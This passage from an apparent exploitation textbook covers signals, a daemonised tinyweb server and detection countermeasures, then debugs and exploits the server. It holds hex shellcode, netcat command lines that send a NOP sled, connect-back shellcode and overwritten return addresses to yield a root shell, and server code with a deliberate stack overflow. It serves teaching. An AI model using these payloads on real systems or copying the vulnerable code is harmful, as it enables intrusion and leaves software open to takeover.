00000030  87 f3 87 ce 49 b0 3f cd  80 49 79 f9 b0 0b 52 68  |....I.?..Iy...Rh|
00000040  2f 2f 73 68 68 2f 62 69  6e 89 e3 52 89 e2 53 89  |//shh/bin..R..S.|
00000050  e1 cd 80                                          |...|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open

As with the previous exploit, the terminal with netcat listening on port 31337 will receive the root shell.

reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42406
whoami
root

It almost seems too easy, doesn't it?

Chapter 0x600. Countermeasures

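The golden poison dart frog secretes an extremely toxic poison: one frog can emit enough to kill 10 adult humans. The only reason these frogs have such an amazingly powerful defense is that a certain species of snake kept eating them and developing a resistance. In response, the frogs kept evolving stronger and stronger poisons as a defense. One result of this co-evolution is that the frogs are safe against all other predators. This type of co-evolution also happens with hackers. Their exploit techniques have been around for years, so it's only natural that defensive countermeasures would develop. In response, hackers find ways to bypass and subvert these defenses, and then new defense techniques are created.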

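This cycle of innovation is actually quite beneficial. Even though viruses and worms can cause quite a bit of trouble and costly interruptions for businesses, they force a response, which fixes the problem. Worms replicate by exploiting existing vulnerabilities in flawed software. Often these flaws go undiscovered for years, but relatively benign worms such as CodeRed or Sasser force these problems to be fixed. As with chickenpox, it's better to suffer a minor outbreak early instead of years later when it can cause real damage. If it weren't for Internet worms making a public spectacle of these security flaws, they might remain unpatched, leaving us vulnerable to an attack from someone with more malicious goals than just replication. In this way, worms and viruses can actually strengthen security in the long run. However, there are more proactive ways to strengthen security. Defensive countermeasures exist that try to nullify the effect of an attack or prevent the attack from happening. A countermeasure is a fairly abstract concept; it could be a security product, a set of policies, a program, or simply an attentive system administrator. These defensive countermeasures can be separated into two groups: those that try to detect the attack and those that try to protect the vulnerability.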

Countermeasures That Detect

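The first group of countermeasures tries to detect the intrusion and respond in some way. The detection process could be anything from an administrator reading logs to a program sniffing the network. The response might include killing the connection or process automatically, or just the administrator scrutinizing everything from the machine's console.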

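As a system administrator, the exploits you know about aren't nearly as dangerous as the ones you don't. The sooner an intrusion is detected, the sooner it can be dealt with and the more likely it can be contained. Intrusions that go undiscovered for months are cause for concern.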

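The way to detect an intrusion is to anticipate what the attacking hacker is going to do. If you know that, then you know what to look for. Countermeasures that detect can look for these attack patterns in log files, network packets, or even program memory. After an intrusion is detected, the hacker can be expunged from the system, any filesystem damage can be undone by restoring from backup, and the exploited vulnerability can be identified and patched. Detecting countermeasures are quite powerful in an electronic world with backup and restore capabilities.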
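As one concrete illustration of looking for an attack pattern in packet or log data, a detector might flag long runs of the x86 NOP byte, since the exploit buffers in the previous chapter begin with a NOP sled. The sketch below is a deliberately naive heuristic, not how any particular intrusion detection product works; the function names and the threshold parameter are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the length of the longest run of 0x90 (x86 NOP) bytes in data. */
size_t longest_nop_run(const uint8_t *data, size_t len) {
    assert(data != NULL || len == 0);
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (data[i] == 0x90) ? run + 1 : 0;
        if (run > best)
            best = run;
    }
    return best;
}

/* Flags input whose longest NOP run reaches threshold (a tuning knob that
 * would have to be chosen to avoid false alarms on legitimate traffic). */
int looks_like_nop_sled(const uint8_t *data, size_t len, size_t threshold) {
    return longest_nop_run(data, len) >= threshold;
}
```

A check like this only catches the exact pattern it anticipates, which is the limitation the rest of this chapter explores from the attacker's side.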

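For the attacker, this means detection can counteract everything he does. Since detection might not always be immediate, there are a few "smash and grab" scenarios where it doesn't matter; however, even then it's better not to leave tracks. Stealth is one of the hacker's most valuable assets. Exploiting a vulnerable program to get a root shell means you can do whatever you want on that system, but avoiding detection additionally means no one knows you're there. The combination of "God mode" and invisibility makes for a dangerous hacker. From a concealed position, passwords and data can be quietly sniffed from the network, programs can be backdoored, and further attacks can be launched on other hosts. To stay hidden, you simply need to anticipate the detection methods that might be used. If you know what they are looking for, you can avoid certain exploit patterns or mimic valid ones. The co-evolutionary cycle between hiding and detecting is fueled by thinking of the things the other side hasn't thought of.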

System Daemons

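To have a realistic discussion of exploit countermeasures and bypass methods, we first need a realistic exploitation target. A remote target will be a server program that accepts incoming connections. In Unix, these programs are usually system daemons. A daemon is a program that runs in the background and detaches from its controlling terminal in a certain way. The term daemon was first coined by MIT hackers in the 1960s. It refers to a molecule-sorting demon from an 1867 thought experiment by a physicist named James Maxwell. In the thought experiment, Maxwell's demon is a being with the supernatural ability to effortlessly perform difficult tasks, apparently violating the second law of thermodynamics. Similarly, in Linux, system daemons tirelessly perform tasks such as providing SSH service and keeping system logs. Daemon program names typically end with a d to signify they are daemons, such as sshd or syslogd.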

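With a few additions, the tinyweb.c code from "A Tinyweb Server" can be made into a more realistic system daemon. This new code uses a call to the daemon() function, which will spawn a new background process. This function is used by many system daemon processes in Linux, and its man page is shown below.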

DAEMON(3)                  Linux Programmer's Manual                 DAEMON(3)

NAME

       daemon - run in the background

SYNOPSIS
       #include <unistd.h>

       int daemon(int nochdir, int noclose);

DESCRIPTION
       The daemon() function is for programs wishing to detach themselves from
       the controlling terminal and run in the background as system daemons.

       Unless the argument nochdir is non-zero, daemon() changes the current
       working directory to the root ("/").

       Unless the argument noclose is non-zero, daemon() will redirect stan
       dard input, standard output and standard error to /dev/null.

RETURN VALUE
       (This function forks, and if the   fork()  succeeds,  the  parent  does
       _exit(0),  so that further errors are seen by the child only.)  On suc
       cess zero will be returned.  If an error occurs,  daemon()  returns  -1
       and  sets  the global variable errno to any of the errors specified for
       the library functions fork(2) and setsid(2).

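System daemons run detached from a controlling terminal, so the new tinyweb daemon code writes to a log file. Without a controlling terminal, system daemons are typically controlled with signals. The new tinyweb daemon program will need to catch the terminate signal so it can exit cleanly when killed.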

Crash Course in Signals

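Signals provide a method of interprocess communication in Unix. When a process receives a signal, its flow of execution is interrupted by the operating system to call a signal handler. Signals are identified by a number, and each one has a default signal handler. For example, when CTRL-C is typed in a program's controlling terminal, an interrupt signal is sent, which has a default signal handler that exits the program. This allows the program to be interrupted, even if it is stuck in an infinite loop.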

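Custom signal handlers can be registered using the signal() function. In the example code below, several signal handlers are registered for certain signals, whereas the main code contains an infinite loop.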

signal_example.c

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
/* Some labeled signal defines from signal.h
 * #define SIGHUP        1  Hangup
 * #define SIGINT        2  Interrupt  (Ctrl-C)
 * #define SIGQUIT       3  Quit (Ctrl-\)
 * #define SIGILL        4  Illegal instruction
 * #define SIGTRAP       5  Trace/breakpoint trap
 * #define SIGABRT       6  Process aborted
 * #define SIGBUS        7  Bus error
 * #define SIGFPE        8  Floating point error
 * #define SIGKILL       9  Kill
 * #define SIGUSR1      10  User defined signal 1
 * #define SIGSEGV      11  Segmentation fault
 * #define SIGUSR2      12  User defined signal 2
 * #define SIGPIPE      13  Write to pipe with no one reading
 * #define SIGALRM      14  Countdown alarm set by alarm()
 * #define SIGTERM      15  Termination (sent by kill command)
 * #define SIGCHLD      17  Child process signal
 * #define SIGCONT      18  Continue if stopped
 * #define SIGSTOP      19  Stop (pause execution)
 * #define SIGTSTP      20  Terminal stop [suspend] (Ctrl-Z)
 * #define SIGTTIN      21  Background process trying to read stdin
 * #define SIGTTOU      22  Background process trying to write to stdout
 */

/* A signal handler */
void signal_handler(int signal) {
   printf("Caught signal %d\t", signal);
   if (signal == SIGTSTP)
      printf("SIGTSTP (Ctrl-Z)");
   else if (signal == SIGQUIT)
      printf("SIGQUIT (Ctrl-\\)");
   else if (signal == SIGUSR1)
      printf("SIGUSR1");
   else if (signal == SIGUSR2)
      printf("SIGUSR2");
   printf("\n");
}

void sigint_handler(int x) {
   printf("Caught a Ctrl-C (SIGINT) in a separate handler\nExiting.\n");
   exit(0);
}

int main() {
   /* Registering signal handlers */
   signal(SIGQUIT, signal_handler); // Set signal_handler() as the
   signal(SIGTSTP, signal_handler); // signal handler for these
   signal(SIGUSR1, signal_handler); // signals.
   signal(SIGUSR2, signal_handler);

   signal(SIGINT, sigint_handler); // Set sigint_handler() for SIGINT.

   while(1) {} // Loop forever.
}

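When this program is compiled and executed, signal handlers are registered, and the program enters an infinite loop. Even though the program is stuck looping, incoming signals will interrupt execution and call the registered signal handlers. In the output below, signals that can be triggered from the controlling terminal are used. The signal_handler() function, when finished, returns execution back into the interrupted loop, whereas the sigint_handler() function exits the program.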

reader@hacking:~/booksrc $ gcc -o signal_example signal_example.c
reader@hacking:~/booksrc $ ./signal_example
Caught signal 20        SIGTSTP (Ctrl-Z)
Caught signal 3 SIGQUIT (Ctrl-\)
Caught a Ctrl-C (SIGINT) in a separate handler
Exiting.
reader@hacking:~/booksrc $

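Specific signals can be sent to a process using the kill command. By default, the kill command sends the terminate signal (SIGTERM) to a process. With the -l command-line switch, kill lists all the possible signals. In the output below, the SIGUSR1 and SIGUSR2 signals are sent to the signal_example program being executed in another terminal.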

reader@hacking:~/booksrc $ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL
 5) SIGTRAP      6) SIGABRT      7) SIGBUS       8) SIGFPE
 9) SIGKILL     10) SIGUSR1     11) SIGSEGV     12) SIGUSR2
13) SIGPIPE     14) SIGALRM     15) SIGTERM     16) SIGSTKFLT
17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU
25) SIGXFSZ     26) SIGVTALRM   27) SIGPROF     28) SIGWINCH
29) SIGIO       30) SIGPWR      31) SIGSYS      34) SIGRTMIN
35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3  38) SIGRTMIN+4
39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12
47) SIGRTMIN+13 48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14
51) SIGRTMAX-13 52) SIGRTMAX-12 53) SIGRTMAX-11 54) SIGRTMAX-10
55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7  58) SIGRTMAX-6
59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX
reader@hacking:~/booksrc $ ps a | grep signal_example
24491 pts/3    R+     0:17 ./signal_example
24512 pts/1    S+     0:00  grep signal_example
reader@hacking:~/booksrc $  kill -10 24491
reader@hacking:~/booksrc $  kill -12 24491
reader@hacking:~/booksrc $  kill -9 24491
reader@hacking:~/booksrc $

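Finally, the SIGKILL signal is sent using kill -9. This signal's handler cannot be changed, so kill -9 can always be used to kill processes. In the other terminal, the running signal_example shows the signals as they are caught and the process is killed.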

reader@hacking:~/booksrc $ ./signal_example
Caught signal 10        SIGUSR1
Caught signal 12        SIGUSR2
Killed
reader@hacking:~/booksrc $

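Signals themselves are pretty simple; however, interprocess communication can quickly become a complex web of dependencies. Fortunately, in the new tinyweb daemon, signals are only used for clean termination, so the implementation is simple.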
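For comparison, clean termination is often written with sigaction() and a flag that the main loop polls, which keeps the handler itself trivial. The sketch below is an alternative to the signal()-based approach in this chapter, not the code the tinyweb daemon uses; all function names in it are invented for illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L  /* expose sigaction() under strict C modes */
#endif
#include <assert.h>
#include <signal.h>
#include <string.h>

/* Set by the handler. sig_atomic_t can be written safely from a handler. */
static volatile sig_atomic_t shutdown_requested = 0;

static void request_shutdown(int signum) {
    (void)signum;              /* the same action is taken for every signal */
    shutdown_requested = 1;
}

/* Install request_shutdown() for SIGTERM and SIGINT.
 * Returns 0 on success, -1 on error. */
int install_shutdown_handlers(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = request_shutdown;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGTERM, &sa, NULL) == -1) return -1;
    if (sigaction(SIGINT, &sa, NULL) == -1) return -1;
    return 0;
}

int shutdown_was_requested(void) { return shutdown_requested != 0; }

/* Call work() repeatedly until a shutdown signal has been seen. */
void run_until_shutdown(void (*work)(void)) {
    assert(work != NULL);
    while (!shutdown_requested)
        work();
}
```

With this arrangement, cleanup such as closing the log file can run in ordinary code after `run_until_shutdown()` returns, instead of inside the signal handler.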

Tinyweb Daemon

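This newer version of the tinyweb program is a system daemon that runs in the background without a controlling terminal. It writes its output to a log file with timestamps, and it listens for the terminate (SIGTERM) signal so it can shut down cleanly when it's killed.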

These additions are fairly minor, but they provide a much more realistic exploit target. The complete listing follows.

tinywebd.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <fcntl.h>
#include <time.h>
#include <signal.h>
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // The port users will be connecting to
#define WEBROOT "./webroot" // The webserver's root directory
#define LOGFILE "/var/log/tinywebd.log" // Log filename

int logfd, sockfd;  // Global log and socket file descriptors
void handle_connection(int, struct sockaddr_in *, int);
int get_file_size(int); // Returns the file size of open file descriptor
void timestamp(int); // Writes a timestamp to the open file descriptor

// This function is called when the process is killed.
void handle_shutdown(int signal) {
   timestamp(logfd);
   write(logfd, "Shutting down.\n", 15); // 15 bytes: the message without its NUL
   close(logfd);
   close(sockfd);
   exit(0);
}

int main(void) {
   int new_sockfd, yes=1;
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;

   logfd = open(LOGFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(logfd == -1)
      fatal("opening log file");

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   printf("Starting tiny web daemon.\n");
   if(daemon(1, 0) == -1) // Fork to a background daemon process.
      fatal("forking to daemon process");

   signal(SIGTERM, handle_shutdown);   // Call handle_shutdown when killed.
   signal(SIGINT, handle_shutdown);   // Call handle_shutdown when interrupted.

   timestamp(logfd);
   write(logfd, "Starting up.\n", 13); // 13 bytes: the message without its NUL
   host_addr.sin_family = AF_INET;      // Host byte order
   host_addr.sin_port = htons(PORT);    // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
      fatal("binding to socket");

   if (listen(sockfd, 20) == -1)
      fatal("listening on socket");

   while(1) { // Accept loop.
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");

      handle_connection(new_sockfd, &client_addr, logfd);
   }
   return 0;
}

/* This function handles the connection on the passed socket from the
 * passed client address and logs to the passed FD. The connection is
 * processed as a web request, and this function replies over the connected
 * socket. Finally, the passed socket is closed at the end of the function.
 */
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
   unsigned char *ptr, request[500], resource[500], log_buffer[500];
   int fd, length;

   length = recv_line(sockfd, request);

   sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);

   ptr = strstr(request, " HTTP/"); // Search for valid-looking request.
   if(ptr == NULL) { // Then this isn't valid HTTP
      strcat(log_buffer, " NOT HTTP!\n");
   } else {
      *ptr = 0; // Terminate the buffer at the end of the URL.
      ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).
      if(strncmp(request, "GET ", 4) == 0)  // Get request
         ptr = request+4; // ptr is the URL.
      if(strncmp(request, "HEAD ", 5) == 0) // Head request
         ptr = request+5; // ptr is the URL.
      if(ptr == NULL) { // Then this is not a recognized request
         strcat(log_buffer, " UNKNOWN REQUEST!\n");
      } else { // Valid request, with ptr pointing to the resource name
         if (ptr[strlen(ptr) - 1] == '/')  // For resources ending with '/',
             strcat(ptr, "index.html");    // add 'index.html' to the end.
         strcpy(resource, WEBROOT);     // Begin resource with web root path
         strcat(resource, ptr);         //  and join it with resource path.
         fd = open(resource, O_RDONLY, 0); // Try to open the file.
         if(fd == -1) { // If file is not found
            strcat(log_buffer, " 404 Not Found\n");
            send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
            send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
         } else {      // Otherwise, serve up the file.
            strcat(log_buffer, " 200 OK\n");
            send_string(sockfd, "HTTP/1.0 200 OK\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            if(ptr == request + 4) { // Then this is a GET request
               if( (length = get_file_size(fd)) == -1)
                  fatal("getting resource file size");
               if( (ptr = (unsigned char *) malloc(length)) == NULL)
                  fatal("allocating memory for reading resource");
               read(fd, ptr, length);  // Read the file into memory.
               send(sockfd, ptr, length, 0);  // Send it to socket.
               free(ptr); // Free file memory.
         }
         close(fd); // Close the file.
         } // End if block for file found/not found.
      } // End if block for valid request.
   } // End if block for valid HTTP.
   timestamp(logfd);
   length = strlen(log_buffer);
   write(logfd, log_buffer, length); // Write to the log.

   shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully.
}

/* This function accepts an open file descriptor and returns
 * the size of the associated file. Returns -1 on failure.
 */
int get_file_size(int fd) {
   struct stat stat_struct;

   if(fstat(fd, &stat_struct) == -1)
      return -1;
   return (int) stat_struct.st_size;
}

/* This function writes a timestamp string to the open file descriptor
 * passed to it.
 */
void timestamp(int fd) {
   time_t now;
   struct tm *time_struct;
   int length;
   char time_buffer[40];

   time(&now);  // Get number of seconds since epoch.
   time_struct = localtime((const time_t *)&now); // Convert to tm struct.
   length = strftime(time_buffer, 40, "%m/%d/%Y %H:%M:%S> ", time_struct);
   write(fd, time_buffer, length); // Write timestamp string to log.
}

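This daemon program forks into the background, writes to a log file with timestamps, and cleanly exits when it is killed. The log file descriptor and connection-receiving socket are declared as globals so they can be closed cleanly by the handle_shutdown() function. This function is set up as the callback handler for the terminate and interrupt signals, which allows the program to exit gracefully when it's killed with the kill command.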
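The timestamp format used by the daemon can be exercised on its own with a fixed time value, which also shows one way to compute the write length instead of hard-coding it. This is a standalone sketch, not part of tinywebd.c; `format_log_timestamp` and `format_log_line` are hypothetical helpers.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <time.h>

/* Format a broken-down time in the log's "MM/DD/YYYY HH:MM:SS> " style.
 * Returns the number of bytes written (not counting the NUL), or 0 if
 * buf is too small. */
size_t format_log_timestamp(char *buf, size_t size, const struct tm *when) {
    assert(buf != NULL && when != NULL);
    return strftime(buf, size, "%m/%d/%Y %H:%M:%S> ", when);
}

/* Build "timestamp + msg" in buf. Returns the total length, or 0 if the
 * line would not fit. Nothing is ever written past buf + size. */
size_t format_log_line(char *buf, size_t size, const struct tm *when, const char *msg) {
    assert(msg != NULL);
    size_t n = format_log_timestamp(buf, size, when);
    size_t m = strlen(msg);
    if (n == 0 || n + m + 1 > size)
        return 0;                    /* refuse to truncate or overflow */
    memcpy(buf + n, msg, m + 1);     /* copies the terminating NUL too */
    return n + m;
}
```

The returned length can be passed straight to write(), so the byte count always matches the message. The bounds check is included for contrast with the unchecked sprintf() and strcat() calls in handle_connection().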

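The output below shows the program compiled, executed, and killed. Notice that the log file contains timestamps as well as the shutdown message when the program catches the terminate signal and calls handle_shutdown() to exit gracefully.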

reader@hacking:~/booksrc $ gcc -o tinywebd tinywebd.c
reader@hacking:~/booksrc $ sudo chown root ./tinywebd
reader@hacking:~/booksrc $ sudo chmod u+s ./tinywebd
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.

reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25058 ?        Ss     0:00 ./tinywebd
25075 pts/3    R+     0:00 grep tinywebd
reader@hacking:~/booksrc $ kill 25058
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25121 pts/3    R+     0:00 grep tinywebd
reader@hacking:~/booksrc $ cat /var/log/tinywebd.log
cat: /var/log/tinywebd.log: Permission denied
reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd.log
07/22/2007 17:55:45> Starting up.
07/22/2007 17:57:00> From 127.0.0.1:38127 "HEAD / HTTP/1.0"     200 OK
07/22/2007 17:57:21> Shutting down.
reader@hacking:~/booksrc $

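This tinywebd program serves HTTP content just like the original tinyweb program, but it behaves as a system daemon, detaching from the controlling terminal and writing to a log file. Both programs are vulnerable to the same overflow exploit; however, the exploitation is only the beginning. Using the new tinyweb daemon as a more realistic exploit target, you will learn how to avoid detection after the intrusion.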

Tools of the Trade

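With a realistic target in place, let's jump back over to the attacker's side of the fence. For this kind of attack, exploit scripts are an essential tool of the trade. Like a set of lock picks in the hands of a professional, exploits open many doors for a hacker. Through careful manipulation of the internal mechanisms, the security can be entirely sidestepped.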

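In previous chapters, we've written exploit code in C and manually exploited vulnerabilities from the command line. The fine line between an exploit program and an exploit tool is a matter of finalization and reconfigurability. Exploit programs are more like guns than tools. Like a gun, an exploit program has a singular utility, and the user interface is as simple as pulling a trigger. Both guns and exploit programs are finalized products that can be used by unskilled people with dangerous results. In contrast, exploit tools usually aren't finished products, nor are they meant for others to use. With an understanding of programming, it's only natural that a hacker would begin to write his own scripts and tools to aid exploitation. These personalized tools automate tedious tasks and facilitate experimentation. Like conventional tools, they can be used for many purposes, extending the skill of the user.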

tinywebd Exploit Tool

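For the tinyweb daemon, we want an exploit tool that allows us to experiment with the vulnerabilities. As in the development of our previous exploits, GDB is used first to figure out the details of the vulnerability, such as offsets. The offset to the return address will be the same as in the original tinyweb.c program, but a daemon program presents added challenges. The daemon call forks the process, running the rest of the program in the child process, while the parent process exits. In the output below, a breakpoint is set after the daemon() call, but the debugger never hits it.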

reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q ./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 47
42
43         if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
44            fatal("setting socket option SO_REUSEADDR");
45
46         printf("Starting tiny web daemon.\n");
47         if(daemon(1, 1) == -1) // Fork to a background daemon process.
48            fatal("forking to daemon process");
49
50         signal(SIGTERM, handle_shutdown);   // Call handle_shutdown when killed.
51         signal(SIGINT, handle_shutdown);   // Call handle_shutdown when interrupted.
(gdb) break 50
Breakpoint 1 at 0x8048e84: file tinywebd.c, line 50.
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon.

Program exited normally.
(gdb)

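When the program is run, it just exits. In order to debug this program, GDB needs to be told to follow the child process, as opposed to following the parent. This is done by setting follow-fork-mode to child. After this change, the debugger will follow execution into the child process, where the breakpoint can be hit.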

(gdb) set follow-fork-mode child
(gdb) help set follow-fork-mode
Set debugger response to a program call of fork or vfork.
A fork or vfork creates a new process.  follow-fork-mode can be:
  parent  - the original process is debugged after a fork
  child   - the new process is debugged after a fork
The unfollowed process will continue to run.
By default, the debugger will follow the parent process.
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon.
[Switching to process 1051]

Breakpoint 1, main () at tinywebd.c:50
50         signal(SIGTERM, handle_shutdown);   // Call handle_shutdown when killed.
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $ ps aux | grep a.out
root       911  0.0  0.0   1636   416 ?        Ss   06:04  0:00 /home/reader/booksrc/a.out
reader    1207 0.0 0.0     2880   748 pts/2    R+   06:13  0:00 grep a.out
reader@hacking:~/booksrc $ sudo kill 911
reader@hacking:~/booksrc $

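It's good to know how to debug child processes, but since we need specific stack values, it's much cleaner and easier to attach to a running process. After killing any stray a.out processes, the tinyweb daemon is started back up and then attached to with GDB.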

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     25830  0.0  0.0   1636   356 ?        Ss   20:10   0:00 ./tinywebd
reader   25837  0.0  0.0   2880   748 pts/1    R+   20:10   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q --pid=25830 --symbols=./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 25830
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already.  Kill it? (y or n) n
Program not killed.
(gdb) bt
#0  0xb7fe77f2 in ?? ()
#1  0xb7f691e1 in ?? ()
#2  0x08048f87 in main () at tinywebd.c:68
(gdb) list 68
63         if (listen(sockfd, 20) == -1)
64            fatal("listening on socket");
65
66         while(1) {   // Accept loop
67            sin_size = sizeof(struct sockaddr_in);
68            new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
69            if(new_sockfd == -1)
70               fatal("accepting connection");
71
72            handle_connection(new_sockfd, &client_addr, logfd);
(gdb) list handle_connection
77      /* This function handles the connection on the passed socket from the
78       * passed client address and logs to the passed FD. The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket. Finally, the passed socket is closed at the end of the function.
81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd.c, line 86.
(gdb) cont
Continuing.

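Execution pauses while the tinyweb daemon waits for a connection. Once again, a connection is made to the web server using a browser to advance the code execution to the breakpoint.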

Breakpoint 1, handle_connection (sockfd=5, client_addr_ptr=0xbffff810) at tinywebd.c:86
86         length = recv_line(sockfd, request);
(gdb) bt
#0  handle_connection (sockfd=5, client_addr_ptr=0xbffff810, logfd=3) at tinywebd.c:86
#1  0x08048fb7 in main () at tinywebd.c:72
(gdb) x/x request
0xbffff5c0:     0x080484ec
(gdb) x/16x request + 500
0xbffff7b4:     0xb7fd5ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff7c4:     0xb7ff9300      0xb7fd5ff4      0xbffff7e0      0xb7f691c0
0xbffff7d4:     0xb7fd5ff4      0xbffff848      0x08048fb7      0x00000005
0xbffff7e4:     0xbffff810      0x00000003      0xbffff838      0x00000004
(gdb) x/x 0xbffff7d4 + 8
0xbffff7dc:     0x08048fb7
(gdb) p /x 0xbffff7dc - 0xbffff5c0
$1 = 0x21c
(gdb) p 0xbffff7dc - 0xbffff5c0
$2 = 540
(gdb) p /x 0xbffff5c0 + 100
$3 = 0xbffff624
(gdb) quit
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 25830
reader@hacking:~/booksrc $

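The debugger shows that the request buffer starts at 0xbffff5c0 and the stored return address is at 0xbffff7dc, which means the offset is 540 bytes. The safest place for the shellcode is near the middle of the 500-byte request buffer. In the output below, an exploit buffer is created that sandwiches the shellcode between a NOP sled and the return address repeated 32 times. The 128 bytes of repeated return address keep the shellcode out of unsafe stack memory, which might be overwritten. There are also unsafe bytes near the beginning of the exploit buffer, which will be overwritten during null termination. To keep the shellcode out of this range, a NOP sled of at least 100 bytes is put in front of it. This leaves a safe landing zone for the execution pointer at 0xbffff624, 100 bytes into the buffer. The following output exploits the vulnerability using the loopback shellcode.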

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell

reader@hacking:~/booksrc $ echo $((540+4 - (32*4) - 83))
333
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 9835
reader@hacking:~/booksrc $ jobs
[1]+ Running                  nc -l -p 31337 &
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x333'; cat loopback_shell; perl -e 'print "\x24\xf6\xff\xbf"x32 . "\r\n"') | nc -w 1 -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

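Since the offset to the return address is 540 bytes, 544 bytes are needed to overwrite the address. With the loopback shellcode at 83 bytes and the overwriting return address repeated 32 times, simple arithmetic shows that the NOP sled needs to be 333 bytes to align everything in the exploit buffer properly. netcat is run in listen mode with an ampersand (&) appended to the end, which sends the process to the background. It listens for the connection back from the shellcode and can be resumed later with the fg (foreground) command. On the LiveCD, the at (@) symbol in the command prompt changes color if there are background jobs, which can also be listed with the jobs command. When the exploit buffer is piped into netcat, the -w option tells it to time out after one second. Afterward, the backgrounded netcat process that received the connect-back shell can be resumed.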
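The arithmetic described above can be reproduced with ordinary shell arithmetic. The following is only a sketch: the two addresses are the ones GDB reported in the session above, and the variable names and the sled_size helper are hypothetical names introduced for illustration.

```sh
#!/bin/sh
BUF_START=0xbffff5c0    # start of request[], from "x/x request"
SAVED_RET=0xbffff7dc    # location of the stored return address

OFFSET=$(( $SAVED_RET - $BUF_START ))   # bytes from buffer start to return address
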